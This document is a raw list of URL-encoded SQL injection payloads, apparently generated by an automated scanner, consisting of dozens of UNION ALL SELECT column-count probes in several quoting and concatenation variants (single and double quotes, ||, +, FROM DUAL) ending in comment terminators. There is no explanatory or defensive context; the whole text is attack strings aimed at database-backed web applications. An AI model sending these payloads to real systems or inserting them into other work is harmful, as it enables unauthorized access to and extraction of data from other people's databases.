-4807%27%20WHERE%203880%3D3880%20UNION%20ALL%20SELECT%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880--%20 -2724%27%20WHERE%201982%3D1982%20UNION%20ALL%20SELECT%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982%2C%201982--%20 -9387%22%20WHERE%209648%3D9648%20UNION%20ALL%20SELECT%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648%2C%209648--%20 -4533%22%20WHERE%209947%3D9947%20UNION%20ALL%20SELECT%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947%2C%209947--%20 -3746%22%20WHERE%205716%3D5716%20UNION%20ALL%20SELECT%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716%2C%205716--%20 -8585%22%20WHERE%209685%3D9685%20UNION%20ALL%20SELECT%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685%2C%209685--%20 -9978%22%20WHERE%202378%3D2378%20UNION%20ALL%20SELECT%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378%2C%202378--%20 -3364%22%20WHERE%203574%3D3574%20UNION%20ALL%20SELECT%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574--%20 -7947%22%20WHERE%206423%3D6423%20UNION%20ALL%20SELECT%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423%2C%206423--%20 -4685%22%20WHERE%205608%3D5608%20UNION%20ALL%20SELECT%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608%2C%205608--%20 -5907%22%20WHERE%201426%3D1426%20UNION%20ALL%20SELECT%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426%2C%201426--%20 -6780%22%20WHERE%203465%3D3465%20UNION%20ALL%20SELECT%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465%2C%203465--%20 -4657%27%20%7C%7C%20%28SELECT%202822%20FROM%20DUAL%20WHERE%201098%3D1098%20UNION%20ALL%20SELECT%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098%2C%201098--%20%20%29%20%7C%7C%20%27 -2510%27%20%7C%7C%20%28SELECT%205581%20FROM%20DUAL%20WHERE%204753%3D4753%20UNION%20ALL%20SELECT%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753%2C%204753--%20%20%29%20%7C%7C%20%27 -2216%27%20%7C%7C%20%28SELECT%205725%20FROM%20DUAL%20WHERE%205886%3D5886%20UNION%20ALL%20SELECT%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886--%20%20%29%20%7C%7C%20%27 -7815%27%20%7C%7C%20%28SELECT%205400%20FROM%20DUAL%20WHERE%206210%3D6210%20UNION%20ALL%20SELECT%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210%2C%206210--%20%20%29%20%7C%7C%20%27 -6759%27%20%7C%7C%20%28SELECT%204933%20FROM%20DUAL%20WHERE%209800%3D9800%20UNION%20ALL%20SELECT%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800--%20%20%29%20%7C%7C%20%27 -9626%27%20%7C%7C%20%28SELECT%208124%20FROM%20DUAL%20WHERE%205226%3D5226%20UNION%20ALL%20SELECT%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226%2C%205226--%20%20%29%20%7C%7C%20%27 -3309%27%20%7C%7C%20%28SELECT%203917%20FROM%20DUAL%20WHERE%207760%3D7760%20UNION%20ALL%20SELECT%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760%2C%207760--%20%20%29%20%7C%7C%20%27 -1690%27%20%7C%7C%20%28SELECT%209685%20FROM%20DUAL%20WHERE%201447%3D1447%20UNION%20ALL%20SELECT%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447%2C%201447--%20%20%29%20%7C%7C%20%27 -3043%27%20%7C%7C%20%28SELECT%206684%20FROM%20DUAL%20WHERE%206553%3D6553%20UNION%20ALL%20SELECT%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553%2C%206553--%20%20%29%20%7C%7C%20%27 -4162%27%20%7C%7C%20%28SELECT%207144%20FROM%20DUAL%20WHERE%207506%3D7506%20UNION%20ALL%20SELECT%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506--%20%20%29%20%7C%7C%20%27 -4240%27%20%7C%7C%20%28SELECT%205778%20WHERE%203023%3D3023%20UNION%20ALL%20SELECT%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023%2C%203023--%20%20%29%20%7C%7C%20%27 -5891%27%20%7C%7C%20%28SELECT%205302%20WHERE%201847%3D1847%20UNION%20ALL%20SELECT%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847%2C%201847--%20%20%29%20%7C%7C%20%27 -1536%27%20%7C%7C%20%28SELECT%208634%20WHERE%202608%3D2608%20UNION%20ALL%20SELECT%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608%2C%202608--%20%20%29%20%7C%7C%20%27 -7519%27%20%7C%7C%20%28SELECT%201236%20WHERE%201902%3D1902%20UNION%20ALL%20SELECT%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902%2C%201902--%20%20%29%20%7C%7C%20%27 -3484%27%20%7C%7C%20%28SELECT%202693%20WHERE%201173%3D1173%20UNION%20ALL%20SELECT%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173%2C%201173--%20%20%29%20%7C%7C%20%27 -4466%27%20%7C%7C%20%28SELECT%202015%20WHERE%206005%3D6005%20UNION%20ALL%20SELECT%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005--%20%20%29%20%7C%7C%20%27 -5200%27%20%7C%7C%20%28SELECT%207243%20WHERE%201615%3D1615%20UNION%20ALL%20SELECT%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615%2C%201615--%20%20%29%20%7C%7C%20%27 -2633%27%20%7C%7C%20%28SELECT%209475%20WHERE%209784%3D9784%20UNION%20ALL%20SELECT%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784--%20%20%29%20%7C%7C%20%27 -9095%27%20%7C%7C%20%28SELECT%203691%20WHERE%204940%3D4940%20UNION%20ALL%20SELECT%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940%2C%204940--%20%20%29%20%7C%7C%20%27 -1881%27%20%7C%7C%20%28SELECT%207248%20WHERE%201728%3D1728%20UNION%20ALL%20SELECT%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728%2C%201728--%20%20%29%20%7C%7C%20%27 -9503%20%2B%20%28SELECT%202362%20FROM%20DUAL%20WHERE%202216%3D2216%20UNION%20ALL%20SELECT%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216%2C%202216--%20%20%29 -1850%20%2B%20%28SELECT%202803%20FROM%20DUAL%20WHERE%204486%3D4486%20UNION%20ALL%20SELECT%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486%2C%204486--%20%20%29 -4211%20%2B%20%28SELECT%204143%20FROM%20DUAL%20WHERE%202434%3D2434%20UNION%20ALL%20SELECT%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434%2C%202434--%20%20%29 -7363%20%2B%20%28SELECT%205804%20FROM%20DUAL%20WHERE%201304%3D1304%20UNION%20ALL%20SELECT%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304--%20%20%29 -9813%20%2B%20%28SELECT%206792%20FROM%20DUAL%20WHERE%203799%3D3799%20UNION%20ALL%20SELECT%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799%2C%203799--%20%20%29 -5473%20%2B%20%28SELECT%207187%20FROM%20DUAL%20WHERE%209700%3D9700%20UNION%20ALL%20SELECT%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700%2C%209700--%20%20%29 -1008%20%2B%20%28SELECT%201117%20FROM%20DUAL%20WHERE%202436%3D2436%20UNION%20ALL%20SELECT%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436%2C%202436--%20%20%29 -3491%20%2B%20%28SELECT%203703%20FROM%20DUAL%20WHERE%204749%3D4749%20UNION%20ALL%20SELECT%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749--%20%20%29 -3206%20%2B%20%28SELECT%205908%20FROM%20DUAL%20WHERE%206377%3D6377%20UNION%20ALL%20SELECT%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377--%20%20%29 -8640%20%2B%20%28SELECT%208597%20FROM%20DUAL%20WHERE%209335%3D9335%20UNION%20ALL%20SELECT%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335--%20%20%29 -6707%20%2B%20%28SELECT%201660%20WHERE%209103%3D9103%20UNION%20ALL%20SELECT%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103%2C%209103--%20%20%29 -9002%20%2B%20%28SELECT%202535%20WHERE%207369%3D7369%20UNION%20ALL%20SELECT%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369%2C%207369--%20%20%29 -9519%20%2B%20%28SELECT%209851%20WHERE%209992%3D9992%20UNION%20ALL%20SELECT%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992%2C%209992--%20%20%29 -6834%20%2B%20%28SELECT%208810%20WHERE%205323%3D5323%20UNION%20ALL%20SELECT%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323%2C%205323--%20%20%29 -1793%20%2B%20%28SELECT%204568%20WHERE%207377%3D7377%20UNION%20ALL%20SELECT%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377%2C%207377--%20%20%29 -5902%20%2B%20%28SELECT%207104%20WHERE%205376%3D5376%20UNION%20ALL%20SELECT%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376%2C%205376--%20%20%29 -4979%20%2B%20%28SELECT%208069%20WHERE%201474%3D1474%20UNION%20ALL%20SELECT%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474%2C%201474--%20%20%29 -5769%20%2B%20%28SELECT%206563%20WHERE%201382%3D1382%20UNION%20ALL%20SELECT%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382--%20%20%29 -9068%20%2B%20%28SELECT%208699%20WHERE%202980%3D2980%20UNION%20ALL%20SELECT%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980%2C%202980--%20%20%29 -9098%20%2B%20%28SELECT%206078%20WHERE%204756%3D4756%20UNION%20ALL%20SELECT%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756--%20%20%29 -3294%27%20%2B%20%28SELECT%20%27hgxC%27%20FROM%20DUAL%20WHERE%206131%3D6131%20UNION%20ALL%20SELECT%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131--%20%20%29%20%2B%20%27 -8936%27%20%2B%20%28SELECT%20%27Iuxi%27%20FROM%20DUAL%20WHERE%209537%3D9537%20UNION%20ALL%20SELECT%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537%2C%209537--%20%20%29%20%2B%20%27 -7116%27%20%2B%20%28SELECT%20%27cnXe%27%20FROM%20DUAL%20WHERE%202563%3D2563%20UNION%20ALL%20SELECT%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563--%20%20%29%20%2B%20%27 -3738%27%20%2B%20%28SELECT%20%27XOiz%27%20FROM%20DUAL%20WHERE%209143%3D9143%20UNION%20ALL%20SELECT%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143%2C%209143--%20%20%29%20%2B%20%27 -6979%27%20%2B%20%28SELECT%20%27NGqZ%27%20FROM%20DUAL%20WHERE%209475%3D9475%20UNION%20ALL%20SELECT%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475%2C%209475--%20%20%29%20%2B%20%27 -7238%27%20%2B%20%28SELECT%20%27UjSs%27%20FROM%20DUAL%20WHERE%209695%3D9695%20UNION%20ALL%20SELECT%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695%2C%209695--%20%20%29%20%2B%20%27 -3478%27%20%2B%20%28SELECT%20%27mKYQ%27%20FROM%20DUAL%20WHERE%201239%3D1239%20UNION%20ALL%20SELECT%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239%2C%201239--%20%20%29%20%2B%20%27 -3804%27%20%2B%20%28SELECT%20%27qjXJ%27%20FROM%20DUAL%20WHERE%207226%3D7226%20UNION%20ALL%20SELECT%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226--%20%20%29%20%2B%20%27 -5595%27%20%2B%20%28SELECT%20%27LDdl%27%20FROM%20DUAL%20WHERE%201221%3D1221%20UNION%20ALL%20SELECT%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221--%20%20%29%20%2B%20%27 -7172%27%20%2B%20%28SELECT%20%27Tyqq%27%20FROM%20DUAL%20WHERE%207865%3D7865%20UNION%20ALL%20SELECT%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865%2C%207865--%20%20%29%20%2B%20%27 -1240%27%20%2B%20%28SELECT%20%27knKR%27%20WHERE%208043%3D8043%20UNION%20ALL%20SELECT%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043%2C%208043--%20%20%29%20%2B%20%27 -7045%27%20%2B%20%28SELECT%20%27LhAa%27%20WHERE%206277%3D6277%20UNION%20ALL%20SELECT%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277%2C%206277--%20%20%29%20%2B%20%27 -6327%27%20%2B%20%28SELECT%20%27EEuc%27%20WHERE%204973%3D4973%20UNION%20ALL%20SELECT%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973--%20%20%29%20%2B%20%27 -3967%27%20%2B%20%28SELECT%20%27KTor%27%20WHERE%207586%3D7586%20UNION%20ALL%20SELECT%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586%2C%207586--%20%20%29%20%2B%20%27 -8161%27%20%2B%20%28SELECT%20%27rVzj%27%20WHERE%205483%3D5483%20UNION%20ALL%20SELECT%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483--%20%20%29%20%2B%20%27 -1721%27%20%2B%20%28SELECT%20%27DlMy%27%20WHERE%202508%3D2508%20UNION%20ALL%20SELECT%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508%2C%202508--%20%20%29%20%2B%20%27 